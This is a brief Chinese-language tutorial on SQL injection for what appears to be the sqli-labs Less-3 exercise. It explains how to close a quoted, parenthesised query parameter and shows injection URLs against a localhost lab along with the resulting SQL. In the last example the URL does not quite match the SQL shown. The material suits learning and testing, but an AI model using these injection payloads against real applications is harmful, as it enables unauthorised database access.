网络安全(sql注入2,less3)
一. 为什么要构造闭合
构造闭合的本质原因是为了让我们好注入语句且不报错。
比如输入
url= http://localhost/sql/Less-3/?id=3 and 1=1
后台可能会产生如下闭合
SELECT * FROM users WHERE id='3 and 1 = 1' LIMIT 0,1
导致id为我们不期望查询的值,此时我们构造闭合
url= http://localhost/sql/Less-3/?id=3' and 1=1 --
得到
SELECT * FROM users WHERE id='3' and 1 = 1
比如:
后台查询语句为
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
输入url为
http://localhost/sql/Less-3/?id=3'
则会生成sql语句
SELECT * FROM users WHERE id=('3'') LIMIT 0,1"
两个''导致转义,无法正常闭合所以会报错
如果我们输入url=http://localhost/sql/Less-3/?id=3') and 1=1
则会生成sql语句
SELECT * FROM users WHERE id=('3') and 1=1') LIMIT 0,1
系统会检查到存在一个正确的闭合,但是多了一个'),我们需要注释掉,此时我们输入
url = url=http://localhost/sql/Less-3/?id=3') --
得到
SELECT * FROM users WHERE id=('3') and 1=1
成功闭合